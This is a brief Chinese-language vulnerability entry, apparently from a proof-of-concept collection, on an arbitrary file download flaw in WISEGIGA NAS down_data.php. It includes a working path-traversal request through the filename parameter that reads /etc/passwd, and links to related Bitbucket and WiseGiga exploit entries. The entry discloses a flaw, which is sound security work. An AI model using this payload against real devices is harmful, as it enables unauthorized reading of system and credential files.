WISEGIGA NAS down_data.php 存在任意文件下载漏洞,由于 /down_data.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。
主页面
验证POC
/down_data.php?filename=../../../../../../../../../../../../../../etc/passwd
Bitbucket 登录绕过漏洞 WiseGiga NAS group.php 远程命令执行漏洞
